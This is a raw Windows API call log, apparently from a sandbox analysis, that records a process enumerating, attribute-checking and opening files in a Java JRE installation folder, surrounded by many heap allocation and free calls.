0x885b8 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.045] AreFileApisANSI () returned 1 [0098.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0098.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x66f40 [0098.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE") returned 43 [0098.046] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_144\\license"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x28)) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.046] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="README.txt", cAlternateFileName="")) returned 1 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0098.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0098.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.046] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0098.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.047] AreFileApisANSI () returned 1 [0098.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt", lpUsedDefaultChar=0x0) returned 46 [0098.054] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0098.054] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.055] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.055] AreFileApisANSI () returned 1 [0098.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0098.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0098.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 46 [0098.055] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.056] GetFileType (hFile=0x27c) returned 0x1 [0098.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0098.056] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.056] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.056] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.057] CloseHandle (hObject=0x27c) returned 1 [0098.057] AreFileApisANSI () returned 1 [0098.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0098.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0098.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 46 [0098.057] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.057] GetFileType (hFile=0x27c) returned 0x1 [0098.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0098.057] CloseHandle (hObject=0x27c) returned 1 [0098.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.057] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.057] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.058] AreFileApisANSI () returned 1 [0098.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0098.058] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0098.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 46 [0098.058] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2e)) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.058] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0098.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.059] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x210, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="release", cAlternateFileName="")) returned 1 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0098.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0098.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0098.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0098.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.059] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0098.059] AreFileApisANSI () returned 1 [0098.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\release", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\release", lpUsedDefaultChar=0x0) returned 43 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.059] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.059] AreFileApisANSI () returned 1 [0098.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0098.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67420 [0098.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x67420, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 43 [0098.060] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.060] GetFileType (hFile=0x27c) returned 0x1 [0098.060] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67420 | out: hHeap=0x20000) returned 1 [0098.060] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.060] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.060] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.060] CloseHandle (hObject=0x27c) returned 1 [0098.061] AreFileApisANSI () returned 1 [0098.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67300 [0098.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x67300, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 43 [0098.061] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.061] GetFileType (hFile=0x27c) returned 0x1 [0098.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67300 | out: hHeap=0x20000) returned 1 [0098.061] CloseHandle (hObject=0x27c) returned 1 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.061] AreFileApisANSI () returned 1 [0098.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0098.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x670c0 [0098.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x670c0, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\release") returned 43 [0098.062] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\release" (normalized: "c:\\program files\\java\\jre1.8.0_144\\release"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x210)) returned 1 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x670c0 | out: hHeap=0x20000) returned 1 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 